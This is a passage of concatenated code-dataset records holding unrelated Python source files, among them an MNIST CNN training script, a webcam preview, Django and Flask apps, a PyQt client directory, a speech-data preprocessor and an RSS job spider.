100))\nlayers.append(ReLU())\n\nlayers.append(FullyConnected(100, 10))\nlayers.append(Softmax())\n\nnn_list['1_HIDDEN_LAYER'] = {'NN': NeuralNetwork(layers, CrossEntropy, labels), 'SGD': SGD(1.0)}\n\n\n# 3. 2-hidden layer\nlayers = list()\nlayers.append(Input(28*28))\n\nlayers.append(FullyConnected(28*28, 100))\nlayers.append(ReLU())\n\nlayers.append(FullyConnected(100, 100))\nlayers.append(ReLU())\n\nlayers.append(FullyConnected(100, 10))\nlayers.append(Softmax())\n\nnn_list['2_HIDDEN_LAYER'] = {'NN': NeuralNetwork(layers, CrossEntropy, labels), 'SGD': SGD(1.0)}\n\n\n# 4. CNN\nlayers = list()\n\n# Convolution layer\nC, H, W = 1, 28, 28\nFN, FH, FW = 30, 5, 5\nS = 1\nOH, OW = (H-FH)//S + 1, (W-FW)//S + 1\n\nimg_shape = (C, H, W)\nft_shape = (FN, FH, FW)\n\nlayers.append(Input(size=(1, H, W)))\n\nlayers.append(Convolution(img_shape, ft_shape))\nlayers.append(ReLU())\n\ninit_ft = np.copy(layers[1].ft)\n\n# Pooling layer\nC, H, W = FN, OH, OW\nPH, PW = 3, 3\nS = PH\nOH, OW = (H - PH) // S + 1, (W - PW) // S + 1\n\nimg_shape = (C, H, W)\npooling_shape = (PH, PW)\n\nlayers.append(Pooling(img_shape, pooling_shape))\n\nlayers.append(Flatten())\n\nlayers.append(FullyConnected(FN*OH*OW, 100))\nlayers.append(ReLU())\n\nlayers.append(FullyConnected(100, 10))\nlayers.append(Softmax())\n\nnn_list['CNN'] = {'NN': NeuralNetwork(layers, CrossEntropy, labels), 'SGD': SGD(0.2)}\n\n\n# fitting\naccuracy_list = list()\n\nfor k, v in nn_list.items():\n print(k)\n nn, sgd = v['NN'], v['SGD']\n tmp_accuracy_list = list()\n\n for epoch_idx in range(n_epoch):\n\n for tr_x, tr_y in next_batch(batch_size, x=training_x, y=training_y):\n sgd.update(nn, tr_x, tr_y)\n\n accuracy = 0.0\n\n for ts_x, ts_y in next_batch(100, x=test_x, y=test_y):\n tmp_accuracy = nn.get_accuracy(ts_x, [labels[np.argmax(y, axis=0)] for y in ts_y])\n accuracy += tmp_accuracy * 100\n\n accuracy /= 10000\n tmp_accuracy_list.append(accuracy)\n\n print(epoch_idx + 1, dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), accuracy)\n\n accuracy_list.append(tmp_accuracy_list)\n\nwith open(output_path + 'accuracy.pkl', 'wb') as f:\n pickle.dump((init_ft, nn_list['CNN']['NN'].layers[1].ft, accuracy_list), f)\n","sub_path":"deeplearning/CNN/conv_mnist_floydhub/main_mnist.py","file_name":"main_mnist.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"493627005","text":"import cv2\nimport pickle\n\ncv2.namedWindow(\"preview\")\nvc = cv2.VideoCapture(0)\nliteral = vc.read()\n \nif vc.isOpened(): # try to get the first frame\n rval, frame = vc.read()\nelse:\n rval = False\nc=0\nwhile rval:\n cv2.imshow(\"preview\", frame)\n rval, frame = vc.read()\n print(c)\n c += 1\ncv2.destroyWindow(\"preview\")","sub_path":"cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"610879432","text":"from decouple import config # noqa\nfrom templated_email import send_templated_mail\n\n\ndef compare_pokemons(pokemon_1, pokemon_2):\n pokemon_1_victory_points = 0\n pokemon_2_victory_points = 0\n\n if pokemon_1.attack > pokemon_2.defense:\n pokemon_1_victory_points += 1\n else:\n pokemon_2_victory_points += 1\n\n if pokemon_2.attack > pokemon_1.defense:\n pokemon_2_victory_points += 1\n else:\n pokemon_1_victory_points += 1\n\n if pokemon_1_victory_points == 2: # pokemon_1 wins # noqa\n return pokemon_1\n elif pokemon_2_victory_points == 2: # pokemon_2 wins\n return pokemon_2\n elif pokemon_1.hit_points > pokemon_2.hit_points: # in case of draw\n return pokemon_1\n else:\n return pokemon_2\n\n\ndef get_battle_result(battle):\n if not battle.has_been_resolved():\n raise Exception(\"Battle has not been resolved yet\")\n\n creator_victory_points = 0\n opponent_victory_points = 0\n\n pokemon_pairs = [\n (battle.creator_pokemon_1, battle.opponent_pokemon_1),\n (battle.creator_pokemon_2, battle.opponent_pokemon_2),\n (battle.creator_pokemon_3, battle.opponent_pokemon_3),\n ]\n\n for creator_pokemon, opponent_pokemon in pokemon_pairs:\n winner = compare_pokemons(creator_pokemon, opponent_pokemon)\n if winner == creator_pokemon:\n creator_victory_points += 1\n else:\n opponent_victory_points += 1\n\n if creator_victory_points > opponent_victory_points: # noqa\n return battle.creator\n else:\n return battle.opponent\n\n\ndef send_battle_result(battle):\n send_templated_mail(\n template_name=\"battle_result\",\n from_email=config(\"EMAIL_ADDRESS\"),\n recipient_list=[battle.creator.email, battle.opponent.email],\n context={\n \"battle_creator\": battle.creator.email,\n \"battle_opponent\": battle.opponent.email,\n \"battle_winner\": battle.winner.email,\n \"battle_id\": battle.id,\n \"battle_creator_pokemon_1\": battle.creator_pokemon_1.name,\n \"battle_creator_pokemon_2\": battle.creator_pokemon_2.name,\n \"battle_creator_pokemon_3\": battle.creator_pokemon_3.name,\n \"battle_opponent_pokemon_1\": battle.opponent_pokemon_1.name,\n \"battle_opponent_pokemon_2\": battle.opponent_pokemon_2.name,\n \"battle_opponent_pokemon_3\": battle.opponent_pokemon_3.name,\n },\n )\n","sub_path":"backend/battles/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"2293481","text":"import argparse\nimport os\nimport json\nimport codecs\nimport re\nfrom scipy.io import wavfile\n\nfrom torch.utils.data import random_split\nfrom random import shuffle\n\nparser = argparse.ArgumentParser(description='Liepa dataset processing')\nparser.add_argument('--data-dir', metavar='DIR',\n help='path to Liepa data', default='/home/wittykiosk/ino_voice_research/data/liepa')\nparser.add_argument('--train-perc', default=85, type=int, help='How many samples to use')\nparser.add_argument('--data-cut', default=50000, type=int, help='How many samples to use')\n\n\ndef generate_labels_json(labels):\n path = ROOT + \"/labels.json\"\n json_string = json.dumps(labels)\n with codecs.open(path, 'w', encoding='utf8') as f:\n f.write(json_string)\n\n\ndef find_all_liepa_files(starting_dir):\n all_paths_tuples = []\n for root, _, files in os.walk(starting_dir):\n path = re.split('\\/', root)\n file_name_set = set()\n for f in files:\n file_name = f[:-4]\n if file_name in file_name_set:\n text_file_name = file_name + \".txt\"\n audio_file_name = file_name + \".wav\"\n all_paths_tuples.append((os.sep.join(path + [text_file_name]), os.sep.join(path + [audio_file_name])))\n else:\n file_name_set.add(file_name)\n\n return all_paths_tuples\n\n\ndef write_txt(txt_file_path, text):\n with codecs.open(txt_file_path, 'w', encoding='utf8') as f:\n f.write(text)\n\n\ndef read_txt(txt_file_path):\n text = \"\"\n try:\n with open(txt_file_path, encoding=\"utf-16\") as file:\n text = file.read()\n except:\n try:\n with open(txt_file_path, encoding=\"utf-8\") as file:\n text = file.read()\n except:\n try:\n with open(txt_file_path, encoding=\"cp1257\") as file:\n text = file.read()\n except:\n try:\n with open(txt_file_path, encoding=\"iso8859_13\") as file:\n text = file.read()\n except:\n return None\n\n return text.rstrip()\n\n\ndef remove_underscores(text):\n remove = False\n is_first_char = True\n filtered_text = []\n for c in text:\n if not remove:\n if c == '_':\n if not is_first_char:\n remove = True\n else:\n is_first_char = c == ' '\n filtered_text.append(c)\n else:\n if c == ' ':\n remove = False\n filtered_text.append(c)\n\n return ''.join(filtered_text)\n\n\ndef filter_text(text):\n for tok in SPECIAL_TOKENS:\n text = text.replace(tok, '')\n text = remove_underscores(text)\n\n filtered_text = []\n for c in text.upper():\n if c in ALL_TOKENS:\n filtered_text.append(c)\n\n text = ''.join(filtered_text)\n return re.sub(' +', ' ', text)\n\n\ndef read_wav(wav_file_path):\n try:\n return wavfile.read(wav_file_path)\n except ValueError:\n return None\n\n\ndef preprocess_sample(paths_tuple):\n txt_file, audio_file = paths_tuple\n\n text_data = read_txt(txt_file)\n if text_data is None:\n return None\n text_data = filter_text(text_data)\n write_txt(txt_file, text_data)\n\n wav_data = read_wav(audio_file)\n if wav_data is None:\n return None\n\n return text_data, txt_file, audio_file\n\n\ndef create_slices_from_ratios(dataset, ratios):\n total_size = len(dataset)\n lengths = []\n for i in range(len(ratios)):\n if i != len(ratios) - 1:\n lengths.append(round(ratios[i] * total_size))\n else:\n lengths.append(total_size - sum(lengths))\n return lengths\n\n\ndef create_manifest(samples, name):\n manifest_path = ROOT + \"/manifests/\"\n if not os.path.exists(manifest_path):\n os.makedirs(manifest_path)\n\n with open(manifest_path + name + \"-manifest.csv\", \"w+\") as f:\n for sample in samples:\n f.write(sample[1] + \",\" + sample[0] + \"\\n\")\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n\n # Get repository root dir\n ROOT = '/'.join(os.path.dirname(os.path.realpath(__file__)).split('/')[:-1])\n DATA_ROOT = args.data_dir\n\n SPECIAL_TOKENS = {' _pauze', ' _tyla', ' _ikvepimas', ' _iskvepimas'}\n ALL_TOKENS = ['_', 'L', 'I', 'E', 'T', 'U', 'V', 'Š', 'K', 'J', 'R', 'Y',\n 'Ž', 'A', 'P', 'Z', 'D', 'S', 'M', 'O', 'C', 'H', 'Ū', 'N',\n 'Č', 'Ų', 'F', 'B', 'Ė', 'G', 'Į', 'Ą', 'Ę', 'W', ' ']\n\n generate_labels_json(ALL_TOKENS)\n print(\"All tokens: \\n{}\".format(ALL_TOKENS))\n\n file_paths_tuples = find_all_liepa_files(DATA_ROOT)\n preprocessed_file_paths = map(preprocess_sample, file_paths_tuples)\n samples = [paths_tuple for paths_tuple in preprocessed_file_paths if paths_tuple]\n\n\n def my_key(paths_tuple):\n text_data, _, _, = paths_tuple\n return len(text_data)\n\n\n samples = [(txt_file, audio_file) for _, txt_file, audio_file in sorted(samples, key=my_key)]\n\n if args.data_cut is not None:\n samples = samples[:args.data_cut]\n\n slices = [args.train_perc / 100, (100 - args.train_perc) / 100]\n train_samples, valid_samples = random_split(samples, create_slices_from_ratios(samples, slices))\n print (\"Training samples: {}\".format(len(train_samples)))\n print (\"Validation samples: {}\".format(len(valid_samples)))\n\n create_manifest(train_samples, \"train\")\n create_manifest(valid_samples, \"valid\")\n","sub_path":"data/liepa_processing.py","file_name":"liepa_processing.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"29167353","text":"from collections import deque\n\ndef solution(s):\n answer = ''\n \n lower = []\n upper = []\n\n for i in range(len(s)):\n if s[i].islower():\n lower.append(s[i])\n elif s[i].isupper():\n upper.append(s[i])\n\n lower.sort()\n upper.sort()\n\n lower.reverse()\n upper.reverse()\n\n result = lower + upper\n answer = ''.join(result)\n\n return answer\n\n'''\ndef solution(s):\n return ''.join(sorted(s, reverse=True))\n'''","sub_path":"Level1/lv1_12.py","file_name":"lv1_12.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"208870443","text":"from libservice.db.models.BaseModel import BaseModel\n\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom sqlalchemy.engine.reflection import Inspector\n\n# Must include all Database objects here to be properly initialized and created if needed\n\nfrom ConfigManager import ConfigManager\nfrom FlaskModule import flask_app\n\n# Alembic\nfrom alembic.config import Config\nfrom alembic import command\n\n\nclass DBManager:\n \"\"\"db_infos = {\n 'user': '',\n 'pw': '',\n 'db': '',\n 'host': '',\n 'port': '',\n 'type': ''\n }\"\"\"\n\n def __init__(self, app=flask_app, test: bool = False):\n self.db_uri = None\n self.db = SQLAlchemy()\n self.app = app\n self.test = test\n\n def create_defaults(self, config: ConfigManager):\n pass\n\n def open(self, db_infos, echo=False):\n self.db_uri = 'postgresql://%(user)s:%(pw)s@%(host)s:%(port)s/%(db)s' % db_infos\n\n self.app.config.update({\n 'SQLALCHEMY_DATABASE_URI': self.db_uri,\n 'SQLALCHEMY_TRACK_MODIFICATIONS': False,\n 'SQLALCHEMY_ECHO': echo\n })\n\n # Create db engine\n self.db.init_app(self.app)\n self.db.app = self.app\n\n BaseModel.set_db(self.db)\n\n with self.app.app_context():\n BaseModel.create_all()\n\n inspector = Inspector.from_engine(self.db.engine)\n tables = inspector.get_table_names()\n\n if not tables:\n # New database - stamp with current revision version\n self.stamp_db()\n else:\n # Apply any database upgrade, if needed\n self.upgrade_db()\n\n def open_local(self, db_infos, echo=False):\n self.db_uri = 'sqlite://'\n\n self.app.config.update({\n 'SQLALCHEMY_DATABASE_URI': self.db_uri,\n 'SQLALCHEMY_TRACK_MODIFICATIONS': False,\n 'SQLALCHEMY_ECHO': echo\n })\n\n # Create db engine\n self.db.init_app(self.app)\n self.db.app = self.app\n BaseModel.set_db(self.db)\n\n with self.app.app_context():\n BaseModel.create_all()\n\n inspector = Inspector.from_engine(self.db.engine)\n tables = inspector.get_table_names()\n\n if not tables:\n # New database - stamp with current revision version\n self.stamp_db()\n else:\n # Apply any database upgrade, if needed\n self.upgrade_db()\n\n def init_alembic(self):\n import sys\n import os\n # determine if application is a script file or frozen exe\n if getattr(sys, 'frozen', False):\n # If the application is run as a bundle, the pyInstaller bootloader\n # extends the sys module by a flag frozen=True and sets the app\n # path into variable _MEIPASS'.\n this_file_directory = sys._MEIPASS\n # When frozen, file directory = executable directory\n root_directory = this_file_directory\n else:\n this_file_directory = os.path.dirname(os.path.abspath(__file__))\n root_directory = os.path.join(this_file_directory, '..' + os.sep + '..')\n\n # this_file_directory = os.path.dirname(os.path.abspath(inspect.stack()[0][1]))\n\n alembic_directory = os.path.join(root_directory, 'alembic')\n ini_path = os.path.join(root_directory, 'alembic.ini')\n\n # create Alembic config and feed it with paths\n alembic_config = Config(ini_path)\n alembic_config.set_main_option('script_location', alembic_directory)\n alembic_config.set_main_option('sqlalchemy.url', self.db_uri)\n\n return alembic_config\n\n def upgrade_db(self):\n alembic_config = self.init_alembic()\n\n # prepare and run the command\n revision = 'head'\n sql = False\n tag = None\n\n # upgrade command\n command.upgrade(alembic_config, revision, sql=sql, tag=tag)\n\n def stamp_db(self):\n alembic_config = self.init_alembic()\n\n # prepare and run the command\n revision = 'head'\n sql = False\n tag = None\n\n # Stamp database\n command.stamp(alembic_config, revision, sql, tag)\n\n\nif __name__ == '__main__':\n config = ConfigManager()\n config.create_defaults()\n manager = DBManager()\n manager.open_local({}, echo=True)\n manager.create_defaults(config)\n","sub_path":"teraserver/python/examples/service/libservice/db/DBManager.py","file_name":"DBManager.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"183325933","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtCore, QtGui, QtSql, uic\n\nimport sys, time\n\nfrom functools import partial\n\nimport Noncache_Clients_Edit_Window, Move_Window, QCustomContextMenu, Settings\n\nclass TableViewModel(QtSql.QSqlTableModel):\n\t\tdef data(self, index, role=QtCore.Qt.DisplayRole):\n\t\t\t\tif role == QtCore.Qt.BackgroundRole :\n\t\t\t\t\t\ttry :\n\t\t\t\t\t\t\tbalance_val = float(index.sibling(index.row(), 3).data())\n\t\t\t\t\t\t\tif balance_val < 1000 :\n\t\t\t\t\t\t\t\tif balance_val < 200 : rowColor = QtGui.QColor(255, 80, 80)\n\t\t\t\t\t\t\t\telse : rowColor = QtGui.QColor(226, 212, 103)\n\t\t\t\t\t\t\telse : rowColor = QtGui.QColor(255, 255, 255)\n\t\t\t\t\t\t\treturn rowColor\n\t\t\t\t\t\texcept : pass\n\n\t\t\t\tif role == QtCore.Qt.TextAlignmentRole:\n\t\t\t\t\t\tif index.column() == 3 : return QtCore.Qt.AlignRight|QtCore.Qt.AlignVCenter\n\n\t\t\t\treturn QtSql.QSqlTableModel.data(self, index, role)\n\n\n\nclass Noncache_Clients_Win_Class(QtGui.QDialog) :\n\t\tdef __init__(self, parent=None) :\n\t\t\t\tQtGui.QDialog.__init__(self, parent)\n\t\t\t\tuic.loadUi(\"ui/nonCacheClients.ui\", self)\n\n\t\t\t\tself.setWindowFlags(QtCore.Qt.Dialog | QtCore.Qt.WindowTitleHint)\n\t\t\t\tself.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n\n\t\t\t\t# Link to Main From\n\t\t\t\tself.MainWin_link = parent\n\n\t\t\t\t# Window Title\n\t\t\t\tself.setWindowTitle(Settings.Settings().winTitleName('Справочник безналичных клиентов'))\n\n\t\t\t\t# Initialize Form\n\t\t\t\tself.init_form()\n\n\t\t\t\tself.tableView.doubleClicked.connect(partial(self.double_clicked, False))\n\n\t\t\t\tself.ln_Client_Search.textChanged.connect(self.Fast_Client_Search)\n\n\t\t\t\t# Custom Context Menu\n\t\t\t\tself.customContextMenu = QCustomContextMenu.QCustomContextMenu()\n\t\t\t\tQtCore.QObject.connect(self.customContextMenu, QtCore.SIGNAL('addItem'), partial(self.double_clicked, True))\n\t\t\t\tQtCore.QObject.connect(self.customContextMenu, QtCore.SIGNAL('changeItem'), partial(self.double_clicked, False))\n\t\t\t\tQtCore.QObject.connect(self.customContextMenu, QtCore.SIGNAL('removeItem'), self.removeClient)\n\n\t\t\t\tself.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n\t\t\t\tself.customContextMenuRequested[QtCore.QPoint].connect(self.showContextMenu)\n\n\t\t\t\t# Hotkeys\n\t\t\t\tself.enterHotkey, self.insertHotkey, self.deleteHotkey, self.escHotkey = QtGui.QAction(self), QtGui.QAction(self),\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t QtGui.QAction(self), QtGui.QAction(self)\n\n\t\t\t\tself.enterHotkey.setShortcut(QtGui.QKeySequence(QtCore.Qt.Key_Return))\n\t\t\t\tself.insertHotkey.setShortcut(QtGui.QKeySequence(QtCore.Qt.Key_Insert))\n\t\t\t\tself.deleteHotkey.setShortcut(QtGui.QKeySequence(QtCore.Qt.Key_Delete))\n\t\t\t\tself.escHotkey.setShortcut(QtGui.QKeySequence(QtCore.Qt.Key_Escape))\n\n\t\t\t\tself.enterHotkey.triggered.connect(partial(self.double_clicked, False))\n\t\t\t\tself.insertHotkey.triggered.connect(partial(self.double_clicked, True))\n\t\t\t\tself.deleteHotkey.triggered.connect(self.removeClient)\n\t\t\t\tself.escHotkey.triggered.connect(self.close)\n\n\t\t\t\tself.tableView.addAction(self.enterHotkey)\n\t\t\t\tself.tableView.addAction(self.insertHotkey)\n\t\t\t\tself.tableView.addAction(self.deleteHotkey)\n\t\t\t\tself.tableView.addAction(self.escHotkey)\n\n\t\t\t\tself.tableView.horizontalHeader().setResizeMode(QtGui.QHeaderView.Stretch)\n\t\t\t\tself.tableView.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)\n\n\n\t\tdef init_form(self) :\n# self.noncache_clients_model = QtSql.QSqlTableModel()\n\t\t\t\tself.noncache_clients_model = TableViewModel()\n\t\t\t\tself.noncache_clients_model.setTable('NONCACHE_CLIENTS')\n\n\t\t\t\tself.noncache_clients_model.setEditStrategy(QtSql.QSqlTableModel.OnManualSubmit)\n\n\t\t\t\tself.noncache_clients_model.setHeaderData(1, QtCore.Qt.Horizontal, \"Клиент\")\n\t\t\t\tself.noncache_clients_model.setHeaderData(2, QtCore.Qt.Horizontal, \"Комментарий\")\n\t\t\t\tself.noncache_clients_model.setHeaderData(3, QtCore.Qt.Horizontal, \"Баланс\")\n\n\t\t\t\t# Set not-editable cells\n\t\t\t\tself.tableView.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)\n\t\t\t\t# Set selection to all row\n\t\t\t\tself.tableView.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)\n\n\t\t\t\tself.noncache_clients_model.select()\n\t\t\t\tself.tableView.setModel(self.noncache_clients_model)\n\n# self.tableView.setItemDelegateForColumn(3, PaintDelegate_Noncache_Clients())\n\t\t\t\t# Hide columns\n\t\t\t\t# ID Client\n\t\t\t\tself.tableView.hideColumn(0)\n\t\t\t\t# Client Password\n\t\t\t\tself.tableView.hideColumn(4)\n\t\t\t\t# Client Password\n\t\t\t\tself.tableView.hideColumn(5)\n\t\t\t\t# Isblocked status\n\t\t\t\tself.tableView.hideColumn(6)\n\t\t\t\t# Operator comment\n\t\t\t\tself.tableView.hideColumn(7)\n\n\n\t\tdef double_clicked (self, isNewClient) :\n\t\t\t\tif not isNewClient :\n\t\t\t\t\t\tcurr_row = self.tableView.currentIndex().row()\n\t\t\t\t\t\tif curr_row == -1 : curr_row = 0\n\n\t\t\t\t\t\tclient_id = self.noncache_clients_model.index(curr_row, 0)\n\t\t\t\t\t\t# Class constructor expect 4 parameters: Link to MainWindows, record Serial ID, isNewDriver Boolean, Link to self class\n\t\t\t\t\t\tself.Noncache_Clients_Edit_Win_Widget = Noncache_Clients_Edit_Window.Noncache_Clients_Edit_Win_Class(self.MainWin_link, client_id.data(), isNewClient, self)\n\n\t\t\t\telse : self.Noncache_Clients_Edit_Win_Widget = Noncache_Clients_Edit_Window.Noncache_Clients_Edit_Win_Class(self.MainWin_link, \"\", isNewClient, self)\n\n\t\t\t\tself.Noncache_Clients_Edit_Win_Widget.show()\n\t\t\t\tMove_Window.Move_Window(self, self.Noncache_Clients_Edit_Win_Widget).Set_Center()\n\n\n\t\tdef removeClient(self):\n\t\t\tcurr_row = self.tableView.currentIndex().row()\n\t\t\tclientName = self.noncache_clients_model.index(curr_row, 1).data()\n\t\t\tconfirm_str = 'Вы действительно хотите удалить категорию %s?' % clientName\n\t\t\treply = QtGui.QMessageBox.question(self, 'Удаление клиента', confirm_str, QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No)\n\n\t\t\tif (curr_row != -1 and reply == QtGui.QMessageBox.Yes):\n\t\t\t\tself.noncache_clients_model.removeRows(curr_row, 1)\n\t\t\t\tupdate_success = self.noncache_clients_model.submitAll()\n\n\t\t\t\tif not update_success :\n\t\t\t\t\tQtGui.QMessageBox.critical(self, \"Ошибка удаления\", \"Ошибка удаления.\\n\"+self.noncache_clients_model.lastError().text(), QtGui.QMessageBox.Ok)\n\t\t\t\t\tself.noncache_clients_model.select()\n\n\n\t\tdef Fast_Client_Search (self):\n\t\t\t\tsearch_text = self.ln_Client_Search.text()\n\t\t\t\tself.noncache_clients_model.setFilter(\"CLIENT_NAME LIKE '%\"+search_text+\"%'\")\n\n\n\t\tdef showContextMenu(self):\n\t\t\tself.customContextMenu.exec_(QtGui.QCursor.pos())\n","sub_path":"src/Noncache_Clients_Window.py","file_name":"Noncache_Clients_Window.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"339650947","text":"from django.conf.urls import url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.views.decorators.cache import cache_page\n\nfrom . import views\n\nurlpatterns = [\n\n url(r'^$', views.ProductsPerCategoryView.as_view(), name='products'),\n #url(r'^$', views.ProductListView.as_view(), name='products'),\n url(r'^tags/$', views.TagView.as_view(), name='tags'),\n\n # Modal view as detail view for a product\n url(r'^product/(?P[\\w-]+)/$', views.ProductDetailView.as_view(), name='product-detail'),\n\n\n url(r'^quotation/$', views.QuotationView.as_view(), name='quotation'),\n url(r'^quotation/confirm/$', views.QuotationConfirmView, name='quotation-confirm'),\n url(r'^featured/$', views.HomepageFeaturedProducts.as_view(), name='featured-products'),\n\n url(r'^services/$', views.ServicesModalView.as_view(), name='services-modal'),\n url(r'^suppliers/$', views.SupplierView.as_view(), name='suppliers'),\n\n\n url(r'test/$', views.ProductsPerCategoryView.as_view(), name='products-per-category'),\n]\n","sub_path":"tcps/tcps/apps/catalogue/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"15582215","text":"from google_images_download import google_images_download\n\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\ndef imageCrawling(keyword,dir):\n response = google_images_download.googleimagesdownload()\n\n arguments={\"keywords\":keyword,\n \"limit\":600,\n \"format\":'jpg',\n \"print_urls\":True,\n \"no_directory\":True,\n \"chromedriver\":'chromedriver.exe',\n \"output_directory\":dir}\n\n paths = response.download(arguments)\n print(paths)\n\nimageCrawling('ShihTzu','E:\\\\ShihTzu')\nimageCrawling('retriever','E:\\\\retriever')\n","sub_path":"googleimage.py","file_name":"googleimage.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"360245237","text":"# Definition for a undirected graph node\n# class UndirectedGraphNode:\n# def __init__(self, x):\n# self.label = x\n# self.neighbors = []\n\nclass Solution:\n # @param node, a undirected graph node\n # @return a undirected graph node\n def cloneGraph(self, node):\n if node == None: return None\n m = {}\n queue = collections.deque()\n queue.append(node)\n while queue:\n cur = queue.popleft()\n if cur not in m:\n m[cur] = UndirectedGraphNode(cur.label)\n for neighbor in cur.neighbors:\n if neighbor not in m:\n m[neighbor] = UndirectedGraphNode(neighbor.label)\n queue.append(neighbor)\n m[cur].neighbors.append(m[neighbor]) \n return m[node]\n","sub_path":"Facebook/CloneGraph_133.py","file_name":"CloneGraph_133.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"40082985","text":"from django.core.mail import send_mail\nfrom django.conf import settings\nfrom celery_tasks.main import app\n\n\n@app.task(bind=True, name='send_active_mail', retry_backoff=3)\ndef send_active_mail(self, to, verify_url):\n subject = '美多商城-邮箱激活'\n html_message = '

尊敬的用户您好!

' \\\n '

感谢您使用美多商城。

' \\\n '

您的邮箱为:%s 。请点击此链接激活您的邮箱:

' \\\n '

%s

' % (to, verify_url, verify_url)\n try:\n send_mail(subject, '', settings.EMAIL_FROM, [to], html_message=html_message)\n except Exception as e:\n self.retry(exc=e, max_retries=3)\n","sub_path":"meiduo_mall/celery_tasks/email_active/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"433811092","text":"\nimport logging\n\nimport gevent\nfrom gevent.monkey import patch_socket\npatch_socket()\n\nimport feedparser\n\nfrom django.db import transaction\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.db.utils import IntegrityError\n\nfrom search.models import (\n SourceLinks,\n JobsData\n)\n\n\nclass Command(BaseCommand):\n\n help = \"Le Spiduer\"\n\n def handle(self, **options):\n\n job_sources = SourceLinks.objects.all() # # values_list(\"url\", flat=True)\n\n def get_posts(job_source):\n\n feeds = feedparser.parse(job_source.url)['entries']\n\n with transaction.atomic(): # # Commits all entries in one transaction\n for feed in feeds:\n\n job_url = feed.get('link')\n job_title = feed.get('title')\n\n if job_url and job_title:\n try:\n JobsData.objects.get_or_create(\n url=job_url,\n title=job_title,\n source=job_source\n )\n except IntegrityError:\n pass\n\n if job_sources:\n try:\n gevent.joinall(\n [gevent.spawn(get_posts, url) for url in job_sources]\n )\n except Exception as e:\n logging.error(str(e))\n","sub_path":"search/management/commands/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"147464292","text":"from flask import Flask, redirect, render_template, request, url_for, jsonify, send_from_directory\nimport dao_rnn\n# from flask_assets import Environment, Bundle\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n# assets = Environment(app)\n\n'''\n$ export FLASK_APP=hello.py\n$ export FLASK_DEBUG=1\n$ flask run\n * Running on http://127.0.0.1:5000/\ndeep learning klasifikasi teks metode rnn\npython, tensorflow, tflearn, hadoop, hive, flask\n'''\n\nRESULTS = {\n \"name\": \"Klasifikasi Jenis Naskah Dinas\",\n \"children\": [\n {\n \"name\": \"Naskah Dinas Peraturan\",\n \"children\": [\n {\n \"name\": \"Peraturan\",\n \"children\": []\n },\n {\n \"name\": \"Edaran\",\n \"children\": []\n },\n {\n \"name\": \"Prosedur Operasional Standar Administrasi Pemerintahan\",\n \"children\": []\n }\n ]\n },\n {\n \"name\": \"Naskah Dinas Penetapan\",\n \"children\": [\n {\n \"name\": \"Keputusan\",\n \"children\": []\n }\n ]\n },\n {\n \"name\": \"Naskah Dinas Penugasan\",\n \"children\": [\n {\n \"name\": \"Instruksi\",\n \"children\": []\n },\n {\n \"name\": \"Surat Perintah\",\n \"children\": []\n },\n {\n \"name\": \"Surat Tugas\",\n \"children\": []\n }\n ]\n },\n {\n \"name\": \"Naskah Dinas Korespondensi\",\n \"children\": [\n {\n \"name\": \"Nota Dinas\",\n \"children\": []\n },\n {\n \"name\": \"Memo\",\n \"children\": []\n },\n {\n \"name\": \"Surat Dinas\",\n \"children\": []\n },\n {\n \"name\": \"Surat Undangan\",\n \"children\": []\n },\n {\n \"name\": \"Surat Pengantar\",\n \"children\": []\n }\n ]\n },\n {\n \"name\": \"Naskah Dinas Khusus\",\n \"children\": [\n {\n \"name\": \"Nota Kesepahaman\",\n \"children\": []\n },\n {\n \"name\": \"Perjanjian Kerja sama\",\n \"children\": []\n },\n {\n \"name\": \"Surat Kuasa\",\n \"children\": []\n },\n {\n \"name\": \"Berita acara\",\n \"children\": []\n },\n {\n \"name\": \"Surat 